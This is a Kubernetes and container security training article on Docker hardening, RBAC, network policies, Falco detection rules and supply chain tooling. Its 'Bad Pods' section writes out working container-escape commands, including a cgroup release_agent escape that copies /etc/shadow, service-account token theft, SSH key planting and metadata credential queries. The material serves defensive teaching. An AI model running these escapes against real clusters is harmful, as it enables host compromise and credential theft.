blacktemple.net -- Cybersecurity News & Analysis -- © 2026

Container, Kubernetes & Supply Chain Security Deep Dive

Training Session: 2026-03-14

Source Material: OWASP Docker/K8s Cheat Sheets, K8s Security Docs, Trivy, kube-bench, kube-hunter, kubesec, Falco, Dockle, SLSA, Cosign, Grype, Syft, Kubernetes Goat, BishopFox Pod Privesc, Harbor, imgcrypt


1. Docker Hardening Controls (OWASP)

Host & Daemon Security

Keep host kernel and Docker Engine current. Container escape CVEs such as the Leaky Vessels runc flaw (CVE-2024-21626) target outdated runtimes. Patching is the primary mitigation.

Disable TCP daemon socket. Never expose /var/run/docker.sock to containers. If TCP is required, enforce mutual TLS. Socket mount = root on host.

Rootless mode. Run Docker daemon as unprivileged user. Eliminates entire class of privilege escalation from container to host root.

Logging. Set the daemon log level to info or higher in /etc/docker/daemon.json. Never run with debug in production: debug logging exposes sensitive data.
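A minimal /etc/docker/daemon.json sketch combining the daemon-level controls covered in this section (key names from the Docker daemon configuration reference; tune values for your environment):

```json
{
  "log-level": "info",
  "icc": false,
  "userns-remap": "default",
  "no-new-privileges": true
}
```

icc: false disables inter-container communication on the default bridge; userns-remap and no-new-privileges apply the user-namespace and privilege-escalation controls below to every container by default.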

Container Isolation & Privilege Restriction

User enforcement chain (defense in depth):

  1. USER directive in Dockerfile (build time)
  2. -u flag at runtime
  3. --userns-remap=default at daemon level (user namespace remapping)
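The build-time link of the chain, sketched with a hypothetical image (the UID 10001 is arbitrary; pick any stable non-root UID):

```dockerfile
FROM python:3.12-slim
# Create a dedicated unprivileged user at build time
RUN useradd --create-home --uid 10001 appuser
WORKDIR /home/appuser
# All subsequent instructions and the running container use this user
USER appuser
```

At runtime, `docker run -u 10001:10001 <image>` reinforces (or overrides) the build-time USER, and --userns-remap=default in daemon.json maps even container root to an unprivileged host UID.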

Capability restriction pattern:

docker run --cap-drop all --cap-add NET_BIND_SERVICE --cap-add CHOWN <image>

Never use --privileged. It grants ALL capabilities + device access + disables seccomp/AppArmor.

Prevent privilege escalation:

docker run --security-opt=no-new-privileges <image>

Blocks setuid/setgid binaries from gaining elevated privileges.

Resource limits (DoS prevention):

docker run --memory=512m --cpus=1.0 --ulimit nofile=1024:2048 \
  --ulimit nproc=256 --restart=on-failure:3 <image>

Filesystem Security

Read-only root filesystem:

docker run --read-only --tmpfs /tmp:rw,noexec,nosuid <image>

Read-only volume mounts:

docker run -v /data:/data:ro <image>

Network Security

Custom networks over default bridge:

docker network create --driver bridge isolated_net
docker run --network=isolated_net <image>

Default docker0 bridge allows inter-container communication. Custom networks provide DNS-based service discovery with isolation.

Image Security

Dockerfile hardening:

  • Pin base image digests: FROM python:3.12-slim@sha256:abc123...
  • Pin OS package versions: apt-get install package=1.2.3-1
  • Use COPY not ADD (ADD auto-extracts archives, fetches URLs)
  • Never curl-pipe-bash in RUN instructions
  • Always specify USER directive
  • Multi-stage builds to minimize attack surface
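A multi-stage Dockerfile sketch applying these rules; the digests and names are placeholders, not real values:

```dockerfile
# Build stage -- base image pinned by digest (placeholder shown)
FROM golang:1.22-bookworm@sha256:<build-digest> AS build
WORKDIR /src
COPY go.mod go.sum ./
RUN go mod download
COPY . .
RUN CGO_ENABLED=0 go build -o /app ./cmd/app

# Runtime stage -- minimal base, no shell, no package manager, non-root user
FROM gcr.io/distroless/static-debian12@sha256:<runtime-digest>
COPY --from=build /app /app
USER nonroot:nonroot
ENTRYPOINT ["/app"]
```

Only the compiled binary reaches the final image; compilers, source, and build tooling stay in the discarded build stage.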

Secrets management:

# Docker secrets (Swarm mode)
echo "db_password" | docker secret create db_pass -
docker service create --secret db_pass <image>

Never bake secrets into images. Use --secret flag with BuildKit for build-time secrets.
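A BuildKit build-time secret, sketched with a hypothetical token file. The secret is mounted only for the single RUN instruction and is never written to an image layer:

```dockerfile
# syntax=docker/dockerfile:1
FROM node:20-slim
WORKDIR /app
COPY package.json package-lock.json ./
# Secret is available at /run/secrets/npm_token only during this RUN
RUN --mount=type=secret,id=npm_token \
    NPM_TOKEN="$(cat /run/secrets/npm_token)" npm ci
```

Build with `docker build --secret id=npm_token,src=./npm_token.txt .` -- the file name here is a placeholder.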

Linux Security Modules

Seccomp: Restrict syscalls. Default profile blocks ~44 dangerous syscalls (mount, reboot, etc.). Custom profiles for tighter control.

AppArmor: Mandatory access controls. Confine file, network, and capability access per container.

SELinux: Label-based mandatory access controls. Use --security-opt label=type:container_t to run a container with a custom SELinux type.


2. Kubernetes RBAC

Architecture

RBAC binds subjects (users, groups, service accounts) to roles (sets of permissions) at namespace or cluster scope.

Enable RBAC:

kube-apiserver --authorization-mode=Node,RBAC

Role Types

| Object | Scope | Binds To |
|---|---|---|
| Role | Namespace | RoleBinding |
| ClusterRole | Cluster-wide | ClusterRoleBinding or RoleBinding |

Least Privilege Pattern

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: production
  name: pod-reader
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  namespace: production
  name: read-pods
subjects:
- kind: ServiceAccount
  name: monitoring-sa
  namespace: production
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io

RBAC Anti-Patterns (Attack Surface)

  • cluster-admin binding to default service accounts
  • Wildcard verbs (*) or resources (*) in roles
  • escalate, bind, impersonate verbs granted broadly
  • create on pods/deployments + access to secrets = arbitrary code execution with any SA
  • Service account tokens auto-mounted when not needed

RBAC Hardening

  • Disable auto-mount: automountServiceAccountToken: false on ServiceAccount and Pod spec
  • Use short-lived tokens (TokenRequest API) instead of static SA tokens
  • Audit RBAC with kubectl auth can-i --list --as=system:serviceaccount:ns:sa
  • Never bind cluster-admin to application service accounts
  • Use resourceNames to scope to specific resources when possible
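The first two hardening items, sketched in YAML. The auto-mount is disabled on the ServiceAccount, and a pod opts back in with a short-lived projected token (names reuse the example above; the audience value is a placeholder):

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: monitoring-sa
  namespace: production
automountServiceAccountToken: false
---
apiVersion: v1
kind: Pod
metadata:
  name: monitoring-pod
  namespace: production
spec:
  serviceAccountName: monitoring-sa
  containers:
  - name: agent
    image: registry.example.com/agent:latest
    volumeMounts:
    - name: sa-token
      mountPath: /var/run/secrets/tokens
      readOnly: true
  volumes:
  - name: sa-token
    projected:
      sources:
      - serviceAccountToken:
          path: token
          expirationSeconds: 3600   # token rotates hourly via TokenRequest API
          audience: kubernetes
```

A stolen projected token expires within the hour, unlike a legacy static SA token.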

3. Kubernetes Network Policies

Default: Allow All

Without NetworkPolicy, all pods can communicate with all other pods across all namespaces. This is the single biggest lateral movement enabler in Kubernetes.

Deny-All Baseline

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress

Apply this to every namespace first, then open specific paths.

Allow Specific Traffic

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-backend
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - protocol: TCP
      port: 8080

Network Policy Limitations

  • Requires a CNI plugin that supports NetworkPolicy (Calico, Cilium, Weave Net -- NOT Flannel)
  • No layer 7 filtering (HTTP methods, paths) without service mesh or Cilium
  • DNS egress must be explicitly allowed (port 53 to kube-dns)
  • No logging of denied connections by default
  • namespaceSelector can reference any namespace -- label namespaces carefully

Egress Control Pattern

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: restrict-egress
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes:
  - Egress
  egress:
  - to:
    - podSelector:
        matchLabels:
          app: database
    ports:
    - protocol: TCP
      port: 5432
  - to:  # Allow DNS
    - namespaceSelector: {}
      podSelector:
        matchLabels:
          k8s-app: kube-dns
    ports:
    - protocol: UDP
      port: 53

4. Pod Security Admission (PSA)

Pod Security Standards (Three Levels)

| Level | Description | Key Restrictions |
|---|---|---|
| Privileged | Unrestricted | None -- allows everything |
| Baseline | Prevents known escalations | No hostNetwork, hostPID, hostIPC, privileged containers, hostPath volumes |
| Restricted | Enforces hardening best practices | All of Baseline + must run as non-root, drop ALL capabilities, read-only root FS, seccomp profile required |

Enforcement Modes

| Mode | Behavior |
|---|---|
| enforce | Rejects non-compliant pods |
| audit | Allows but logs violations |
| warn | Allows but returns warnings to user |

Namespace-Level Configuration

apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted

Restricted Security Context (Full Hardening)

apiVersion: v1
kind: Pod
metadata:
  name: hardened-pod
spec:
  automountServiceAccountToken: false
  securityContext:
    runAsNonRoot: true
    runAsUser: 65534
    runAsGroup: 65534
    fsGroup: 65534
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    image: registry.example.com/app@sha256:abc123
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]
      seccompProfile:
        type: RuntimeDefault
    resources:
      limits:
        memory: "256Mi"
        cpu: "500m"
      requests:
        memory: "128Mi"
        cpu: "250m"
    volumeMounts:
    - name: tmp
      mountPath: /tmp
  volumes:
  - name: tmp
    emptyDir:
      sizeLimit: 100Mi

5. Container Escape Techniques (BishopFox "Bad Pods")

Taxonomy of Pod Privilege Escalation

Eight distinct escalation paths based on which security context fields are misconfigured. Each "Bad Pod" represents a different combination of privileges.

Bad Pod #1: Everything Allowed

Config: privileged: true, hostNetwork: true, hostPID: true, hostIPC: true, hostPath: /

Attack:

  1. Schedule pod on control-plane node via nodeName
  2. chroot /host to gain host root shell
  3. Read etcd secrets directly, harvest SA tokens from kubelet

Impact: Full cluster compromise through multiple paths.

Bad Pod #2: Privileged + HostPID

Config: privileged: true, hostPID: true

Attack:

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

Enters host's PID 1 namespace = root shell on node.

Impact: Full cluster compromise. Without hostPID, nsenter only enters container process namespaces.

Bad Pod #3: Privileged Only

Config: privileged: true

Attack Path A -- Device Mount:

# Find host disk
fdisk -l
# Mount it
mount /dev/sda1 /mnt
# Browse host filesystem
ls /mnt/etc/kubernetes/

Attack Path B -- Cgroup Escape:

# Exploit the cgroup-v1 release_agent user-mode helper (the classic PoC):
# the kernel executes release_agent as root on the HOST when a cgroup empties
d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -n1))       # locate a cgroup dir exposing release_agent
mkdir -p $d/w
echo 1 > $d/w/notify_on_release
t=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)  # container's overlayfs upperdir (its host path)
echo $t/cmd > $d/release_agent                        # point release_agent at our payload's host path
echo "#!/bin/sh" > /cmd
echo "cat /etc/shadow > $t/output" >> /cmd            # payload runs as root on the host
chmod +x /cmd
sh -c "echo 0 > $d/w/cgroup.procs"                    # add and exit a process to empty the cgroup
sleep 1
cat /output                                           # upperdir file is visible inside the container

Impact: Full cluster compromise.

Bad Pod #4: HostPath Only

Config: hostPath: {path: /, type: Directory}

Attack:

  1. Mount entire host filesystem
  2. Search for kubeconfig files: find /host -name kubeconfig
  3. Extract SA tokens: find /host -path "*/serviceaccount/token" -exec cat {} \;
  4. Plant SSH keys: echo $KEY >> /host/root/.ssh/authorized_keys
  5. Read /host/etc/shadow for password cracking

Impact: Full cluster compromise via credential theft.

Bad Pod #5: HostPID Only

Config: hostPID: true

Attack:

# View all host processes and their environment variables
ps auxe | grep -i password
ps auxe | grep -i token
ps auxe | grep -i secret
# Extract credentials from process environments
cat /proc/1/environ | tr '\0' '\n'

Impact: Credential leakage, DoS via process termination.

Bad Pod #6: HostNetwork Only

Config: hostNetwork: true

Attack:

# Sniff traffic on host interfaces
tcpdump -i eth0 -w capture.pcap
# Access localhost-bound services
curl http://localhost:10250/pods  # kubelet API
# Bypass network policies (using host network stack)

Impact: Traffic interception, access to internal services, NetworkPolicy bypass.

Bad Pod #7: HostIPC Only

Config: hostIPC: true

Attack:

# Inspect shared memory
ls -la /dev/shm
ipcs -a
# Read/write shared memory segments from other pods

Impact: Data access from pods using host IPC namespace.

Bad Pod #8: Nothing Allowed (Standard Pod)

Even with no special privileges, attack vectors exist:

  1. Cloud metadata service: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
  2. Overpermissioned default SA: kubectl auth can-i --list from within pod
  3. Anonymous kubelet/API access: if anonymous-auth: true
  4. Kernel/runtime CVEs: unpatched container escape vulnerabilities
  5. Internal service discovery: DNS enumeration + service probing through pod network

Universal Mitigations

  • Enforce PSA restricted level on all namespaces
  • allowPrivilegeEscalation: false and runAsNonRoot: true everywhere
  • Disable SA token auto-mounting: automountServiceAccountToken: false
  • Block cloud metadata: NetworkPolicy denying egress to 169.254.169.254
  • Use admission controllers (OPA Gatekeeper, Kyverno) for custom policy enforcement
  • Monitor pod creation with unusual security contexts via audit logging
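The metadata-service block from the list above, expressed as a NetworkPolicy. This assumes a CNI that honors ipBlock with except (e.g. Calico or Cilium):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-cloud-metadata
  namespace: production
spec:
  podSelector: {}        # applies to every pod in the namespace
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32   # cloud metadata endpoint
```

Combine this with the default-deny baseline and explicit allow rules from section 3 rather than using it as the only egress policy.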

6. Kubernetes API Server & etcd Hardening

API Server Authentication (Recommended)

| Method | Security Level | Notes |
|---|---|---|
| OIDC with short-lived tokens | Strong | Preferred for human users |
| Managed provider IAM (EKS/GKE/AKS) | Strong | Cloud-native integration |
| X509 client certs | Weak | No revocation mechanism |
| Static token file | Dangerous | Cleartext CSV, no rotation |
| Service account tokens | Workload-only | Never use for human access |

etcd Security

etcd write access = cluster root. Treat etcd as the most critical component.

  • Mutual TLS between API server and etcd (client certificates)
  • Isolate etcd behind firewall -- only API servers connect
  • Implement etcd ACLs restricting read/write to required keyspace
  • Encrypt secrets at rest: EncryptionConfiguration with aescbc or aesgcm provider
  • Separate etcd instances for different clusters
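A minimal EncryptionConfiguration sketch for secrets at rest. The key value is a placeholder: generate 32 random bytes and base64-encode them:

```yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources: ["secrets"]
  providers:
  - aescbc:
      keys:
      - name: key1
        secret: <base64-encoded-32-byte-key>   # placeholder
  - identity: {}   # fallback so pre-existing plaintext data stays readable
```

Pass it via kube-apiserver --encryption-provider-config=/path/to/config.yaml, then rewrite existing secrets (e.g. kubectl get secrets -A -o json | kubectl replace -f -) so they are re-stored encrypted.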

Critical Ports to Restrict

| Port | Service | Access |
|---|---|---|
| 6443 | API Server | Authenticated clients only |
| 2379-2380 | etcd | API server only |
| 10250 | kubelet | API server only |
| 10257 | controller-manager | Localhost only |
| 10259 | scheduler | Localhost only |
| 30000-32767 | NodePort | Restrict per policy |

Audit Logging

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
- level: RequestResponse
  resources:
  - group: ""
    resources: ["secrets", "configmaps"]
- level: Metadata
  resources:
  - group: ""
    resources: ["pods", "services"]
- level: Request
  resources:
  - group: "rbac.authorization.k8s.io"
    resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]

Enable with: kube-apiserver --audit-policy-file=/path/to/policy.yaml --audit-log-path=/var/log/k8s-audit.log

Monitor for status: "Forbidden" responses indicating credential abuse or privilege probing.

Admission Controllers

  • ImagePolicyWebhook: Reject images from untrusted registries, unscanned images, disallowed base images
  • Pod Security Admission: Enforce pod security standards per namespace
  • ValidatingAdmissionPolicy (K8s 1.28+): CEL-based declarative validation without webhooks
  • OPA Gatekeeper / Kyverno: Full policy engines for custom admission control
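A CEL-based sketch of the ValidatingAdmissionPolicy approach, rejecting privileged pods. The apiVersion shown is the GA v1 (K8s 1.30+; use v1beta1 on 1.28/1.29), and a matching ValidatingAdmissionPolicyBinding, omitted here, is required to activate it:

```yaml
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicy
metadata:
  name: deny-privileged-pods
spec:
  failurePolicy: Fail
  matchConstraints:
    resourceRules:
    - apiGroups: [""]
      apiVersions: ["v1"]
      operations: ["CREATE", "UPDATE"]
      resources: ["pods"]
  validations:
  - expression: >-
      object.spec.containers.all(c,
        !has(c.securityContext) ||
        !has(c.securityContext.privileged) ||
        c.securityContext.privileged == false)
    message: "privileged containers are not allowed"
```

Unlike webhook-based engines, the expression is evaluated in-process by the API server, so there is no external service to run or fail open.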

7. Secrets Management in Kubernetes

Problem: K8s Secrets Are Base64, Not Encrypted

kubectl get secret db-creds -o jsonpath='{.data.password}' | base64 -d

By default, secrets are stored as plaintext in etcd.
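The same reversal works anywhere with a made-up value -- base64 is an encoding, not encryption, so no key is involved:

```shell
# Encode the way Kubernetes stores Secret data
echo -n "hunter2" | base64        # aHVudGVyMg==
# Anyone who can read etcd (or the Secret object) reverses it freely
echo "aHVudGVyMg==" | base64 -d   # hunter2
```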

Hardening Chain

  1. Encrypt at rest: EncryptionConfiguration with KMS provider
  2. Mount as files, not env vars: Environment variables leak via process listing, crash dumps, logs
  3. Read-only mounts: readOnly: true on secret volume mounts
  4. External secret managers: HashiCorp Vault, AWS Secrets Manager, Azure Key Vault with CSI driver
  5. RBAC restriction: Limit get/list/watch on secrets to specific service accounts
  6. Audit logging: Log all secret access at Metadata or Request level

# Mount secret as read-only file
volumes:
- name: db-creds
  secret:
    secretName: db-credentials
    defaultMode: 0400  # Read-only for owner
containers:
- name: app
  volumeMounts:
  - name: db-creds
    mountPath: /etc/secrets
    readOnly: true

8. Runtime Security with Falco

Architecture

Falco intercepts system calls at the kernel level using eBPF (or kernel module), enriches events with container/K8s metadata, and evaluates against a rule engine to produce alerts.

Rule Syntax

- rule: Terminal Shell in Container
  desc: Detect a shell spawned in a container with an attached terminal
  condition: >
    spawned_process and container and
    proc.name in (bash, sh, zsh, dash) and
    proc.tty != 0
  output: >
    Shell spawned in container with attached terminal
    (user=%user.name container_id=%container.id container_name=%container.name
     shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline
     terminal=%proc.tty image=%container.image.repository:%container.image.tag)
  priority: WARNING
  tags: [container, shell, mitre_execution, T1059]

- rule: Read Sensitive File in Container
  desc: Detect reading of sensitive files within containers
  condition: >
    open_read and container and
    fd.name in (/etc/shadow, /etc/passwd, /etc/sudoers)
  output: >
    Sensitive file read in container
    (user=%user.name file=%fd.name container=%container.name
     image=%container.image.repository)
  priority: WARNING
  tags: [container, filesystem, mitre_credential_access, T1003]

- rule: Unexpected Outbound Connection
  desc: Detect outbound network connections from containers to unexpected destinations
  condition: >
    outbound and container and
    not fd.sip in (rfc_1918_addresses) and
    not k8s.ns.name in (kube-system, monitoring)
  output: >
    Unexpected outbound connection from container
    (command=%proc.cmdline connection=%fd.name container=%container.name
     namespace=%k8s.ns.name image=%container.image.repository)
  priority: NOTICE
  tags: [network, mitre_exfiltration, T1041]

- rule: Container Drift - New Executable
  desc: Detect execution of binaries not present in original image
  condition: >
    spawned_process and container and
    not proc.exe in (known_binaries) and
    evt.type = execve
  output: >
    New executable detected in container (not in original image)
    (proc=%proc.name exe=%proc.exe container=%container.name
     image=%container.image.repository)
  priority: ERROR
  tags: [container, mitre_persistence, T1554]

- rule: Mount Detected in Container
  desc: Detect mount/umount operations inside containers
  condition: >
    spawned_process and container and
    proc.name in (mount, umount)
  output: >
    Mount operation in container
    (command=%proc.cmdline container=%container.name
     image=%container.image.repository user=%user.name)
  priority: ERROR
  tags: [container, mitre_privilege_escalation, T1611]

- rule: Privileged Container Started
  desc: Detect when a privileged container is started
  condition: >
    container_started and container.privileged = true
  output: >
    Privileged container started
    (container=%container.name image=%container.image.repository
     namespace=%k8s.ns.name)
  priority: CRITICAL
  tags: [container, mitre_privilege_escalation, T1610]

Deployment Options

  • DaemonSet: Deploy Falco on every node for syscall monitoring
  • Kubernetes Audit Log: Configure API server to send audit events to Falco for API-level detection
  • Falcosidekick: Alert routing to Slack, PagerDuty, Elasticsearch, CloudEvents, webhooks

Output Channels

Syslog, stdout, HTTP endpoints, gRPC services. Integrate with SIEM/SOAR for automated response.

Detection Capabilities

| Category | Examples |
|---|---|
| Shell access | Interactive shells in containers |
| File access | Sensitive file reads (/etc/shadow, /etc/kubernetes) |
| Network | Unexpected outbound connections, DNS tunneling |
| Process | New binaries, unexpected process trees |
| Privilege | Container escape attempts, mount operations, nsenter |
| K8s API | Unauthorized API calls, secret access, RBAC changes |

9. Supply Chain Security

9.1 SBOM Generation with Syft

Software Bill of Materials -- inventory of all components in an artifact. Required for vulnerability management and compliance.

# Generate SBOM from container image
syft alpine:latest -o spdx-json=sbom-spdx.json
syft alpine:latest -o cyclonedx-json=sbom-cdx.json

# Generate from filesystem
syft ./my-project -o syft-json=sbom.json

# Multiple output formats simultaneously
syft <image> -o spdx-json=./spdx.json -o cyclonedx-json=./cdx.json

Supported formats: CycloneDX (JSON/XML), SPDX (JSON), Syft native JSON.

Supported ecosystems: Alpine (apk), Debian (dpkg), RPM, Go modules, Python (pip/poetry), Java (Maven/Gradle), JavaScript (npm/yarn), Ruby (gems), Rust (cargo), PHP (composer), .NET (NuGet).

9.2 Vulnerability Scanning with Grype

# Scan container image
grype alpine:latest

# Scan directory
grype ./my-project

# Scan from SBOM (fastest -- no image pull needed)
grype sbom:./sbom.json

# Scan with severity filtering
grype alpine:latest --only-fixed --fail-on high

Vulnerability prioritization: EPSS (Exploit Prediction Scoring System), KEV (Known Exploited Vulnerabilities), custom risk scoring. OpenVEX support for filtering false positives.

Databases: NVD, GitHub Security Advisories, OS vendor advisories (Alpine, Debian, Ubuntu, RHEL, etc.).

9.3 Vulnerability Scanning with Trivy

# Container image scan
trivy image python:3.4-alpine

# Filesystem scan (vulns + secrets + misconfig)
trivy fs --scanners vuln,secret,misconfig myproject/

# Kubernetes cluster assessment
trivy k8s --report summary cluster

# Generate SBOM
trivy image --format spdx-json -o sbom.json alpine:latest

Scanning capabilities:

  • OS packages and language dependencies (CVEs)
  • IaC misconfigurations (Terraform, CloudFormation, Dockerfile, K8s manifests)
  • Secret detection (API keys, tokens, passwords in code/images)
  • License compliance checking
  • SBOM generation (SPDX, CycloneDX)

CI/CD integration: GitHub Actions (aquasecurity/trivy-action), GitLab CI, Jenkins, CircleCI.

9.4 Container Image Linting with Dockle

# Basic scan
dockle myimage:latest

# JSON output for CI
dockle -f json -o results.json myimage:latest

# Scan saved image
docker save myimage:tag -o image.tar
dockle --input image.tar

Checkpoint categories:

  • CIS Docker Image Checks (11): Base image trust, package management, secrets, user config
  • Dockle Checks (6): Sudo usage, sensitive directory mounting, package manager optimization, tagging
  • Linux System Checks (3): User/group config, password security, unnecessary files

Severity levels: FATAL > WARN > INFO > SKIP > PASS

Comparison with other tools:

| Tool | Target | Focus |
|---|---|---|
| Dockle | Built images | Security auditing |
| Hadolint | Dockerfiles | Lint validation |
| Docker Bench | Host/daemon | Security audit |
| Trivy/Grype | Images | Vulnerability scanning |

9.5 Container Signing with Cosign (Sigstore)

Keyless signing (recommended) -- uses OIDC identity + Fulcio CA + Rekor transparency log:

# Sign a container image (keyless -- prompts for OIDC auth)
cosign sign $IMAGE

# Verify with identity constraints
cosign verify $IMAGE \
  --certificate-identity=user@example.com \
  --certificate-oidc-issuer=https://accounts.google.com

# Verify against a public key
cosign verify --key cosign.pub $IMAGE

Key-based signing:

# Generate key pair
cosign generate-key-pair

# Sign with key
cosign sign --key cosign.key $IMAGE

# Verify
cosign verify --key cosign.pub $IMAGE

Attestations (in-toto DSSE):

# Create attestation (e.g., SBOM, SLSA provenance)
cosign attest --predicate sbom.json --key cosign.key $IMAGE_DIGEST

# Verify attestation
cosign verify-attestation --key cosign.pub $IMAGE

Blob signing (non-container artifacts):

cosign sign-blob artifact.tar.gz --bundle artifact.sigstore.json --yes
cosign verify-blob artifact.tar.gz \
  --bundle artifact.sigstore.json \
  --certificate-identity "identity" \
  --certificate-oidc-issuer "issuer-url"

Air-gapped verification: Download images and signatures while connected, then verify offline using stored TUF roots.

Harbor release verification (real-world example from source):

cosign verify-blob \
  --bundle harbor-offline-installer-v2.15.0.tgz.sigstore.json \
  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
  --certificate-identity-regexp '^https://github.com/goharbor/harbor/.github/workflows/publish_release.yml@refs/tags/v.*$' \
  harbor-offline-installer-v2.15.0.tgz

9.6 SLSA Framework (Supply-chain Levels for Software Artifacts)

Security framework for preventing supply chain tampering. Four build levels with increasing assurance:

| Level | Name | Requirements | Threats Addressed |
|---|---|---|---|
| Build L0 | No Guarantees | None | None |
| Build L1 | Provenance Exists | Documented build process, provenance generated and distributed | Release mistakes, lack of transparency |
| Build L2 | Hosted Build Platform | L1 + hosted/dedicated build infra, digitally signed provenance | Post-build tampering, insider threats with legal exposure |
| Build L3 | Hardened Builds | L2 + isolation between build runs, signing keys inaccessible to build steps | During-build tampering, compromised credentials, multi-tenant attacks |

Key concept -- Provenance: Machine-readable metadata documenting: who built it, what source it came from, what build platform/process was used, and what dependencies were included.

Three stakeholder concerns:

  • Producers: Protection against tampering and insider threats
  • Consumers: Verification that artifacts are authentic
  • Infrastructure: Build platform hardening and auditability

Achieving SLSA L3 in practice:

  1. Use a hosted CI/CD system (GitHub Actions, Google Cloud Build)
  2. Generate provenance automatically during build
  3. Sign provenance with keyless signing (Sigstore)
  4. Verify provenance at deployment (admission controller)
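Steps 1-3 can be wired together in GitHub Actions with the slsa-github-generator reusable workflow. This is a sketch: the build command and artifact path are placeholders, and the workflow path and tag should be checked against the project's current docs:

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      hashes: ${{ steps.hash.outputs.hashes }}
    steps:
      - uses: actions/checkout@v4
      - run: make release        # produces ./dist/* (placeholder build)
      - id: hash
        run: echo "hashes=$(sha256sum dist/* | base64 -w0)" >> "$GITHUB_OUTPUT"

  provenance:
    needs: build
    permissions:
      id-token: write    # keyless signing via the runner's OIDC identity
      contents: write    # attach provenance to the release
      actions: read
    uses: slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@v2.0.0
    with:
      base64-subjects: ${{ needs.build.outputs.hashes }}
```

Step 4 then happens at deploy time, e.g. with slsa-verifier or a Kyverno/Gatekeeper admission policy that checks the provenance attestation.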

9.7 Container Image Encryption (imgcrypt)

From the imgcrypt codebase -- a containerd subproject for encrypted container images.

Architecture:

  • Relies on ocicrypt library for cryptographic operations on OCI image layers
  • Integrates with containerd via stream processors that decrypt layers on-the-fly
  • Supports JWE (JSON Web Encryption), PKCS7, and PKCS11 (hardware tokens) encryption schemes

Encryption model:

  • Each image layer is individually encrypted
  • Media types change to indicate encryption: application/vnd.oci.image.layer.v1.tar+gzip+encrypted
  • Manifest is rewritten with encrypted layer descriptors
  • Encryption annotations carry wrapped keys per recipient
  • Multiple recipients supported (each gets their own wrapped copy of the symmetric key)

Containerd stream processor configuration:

[stream_processors."io.containerd.ocicrypt.decoder.v1.tar.gzip"]
    accepts = ["application/vnd.oci.image.layer.v1.tar+gzip+encrypted"]
    returns = "application/vnd.oci.image.layer.v1.tar+gzip"
    path = "/usr/local/bin/ctd-decoder"

Usage workflow:

# Generate keys
openssl genrsa -out mykey.pem
openssl rsa -in mykey.pem -pubout -out mypubkey.pem

# Encrypt image
ctr-enc images encrypt --recipient jwe:mypubkey.pem \
  --platform linux/amd64 docker.io/library/bash:latest bash.enc:latest

# Without key -- access denied
ctr-enc run --rm bash.enc:latest test echo 'Hello'
# Error: "you are not authorized to use this image: missing private key needed for decryption"

# With key -- access granted
ctr-enc run --rm --key mykey.pem bash.enc:latest test echo 'Hello'
# Hello

Security properties:

  • Confidentiality: Image layers encrypted at rest and in transit through untrusted registries
  • Access control: Only holders of private keys can decrypt and run images
  • Key rotation: Re-encrypt with new recipients without re-pulling base content
  • Authorization check: CheckAuthorization() verifies decryption capability without full decryption (unwrap-only mode)

Use cases:

  • Multi-tenant registries where image content must be isolated
  • Compliance requirements for data-at-rest encryption
  • Distributing proprietary images through public/untrusted registries

9.8 Harbor Registry -- Scanning & Signing Workflows

Harbor is a CNCF graduated project that integrates scanning, signing, and SBOM management into a container registry.

Integrated scanning workflow:

  • Built-in Trivy adapter runs as a sidecar service
  • Configurable scan triggers: on push, on schedule (nightly cron), manual
  • Scans OS packages + language libraries with configurable severity levels
  • Results surfaced in UI with CVE details and fix availability
  • Vulnerability allowlisting: Projects can maintain CVE allowlists (with expiration) to bypass blocking on accepted risks
  • Policy enforcement: Block deployment of images above severity threshold

Harbor Trivy adapter configuration (from source):

SCANNER_TRIVY_VULN_TYPE=os,library
SCANNER_TRIVY_SEVERITY=UNKNOWN,LOW,MEDIUM,HIGH,CRITICAL
SCANNER_TRIVY_IGNORE_UNFIXED=false
SCANNER_TRIVY_SECURITY_CHECKS=vuln
SCANNER_TRIVY_OFFLINE_SCAN=false

Nightly scanning pipeline (from Harbor CI):

# Scans all Harbor component images nightly
strategy:
  matrix:
    versions: [dev, v2.12.0-dev]
    images: [harbor-core, harbor-db, harbor-exporter,
             harbor-jobservice, harbor-log, harbor-portal,
             harbor-registryctl, prepare]
# Uses aquasecurity/trivy-action, outputs SARIF to GitHub Security tab

Signing integration:

  • Notary (Docker Content Trust): Legacy signing with trust-on-first-use model
  • Cosign (Sigstore): Keyless signing with transparency log, preferred for new deployments
  • Policy enforcement: Reject unsigned images via admission webhook

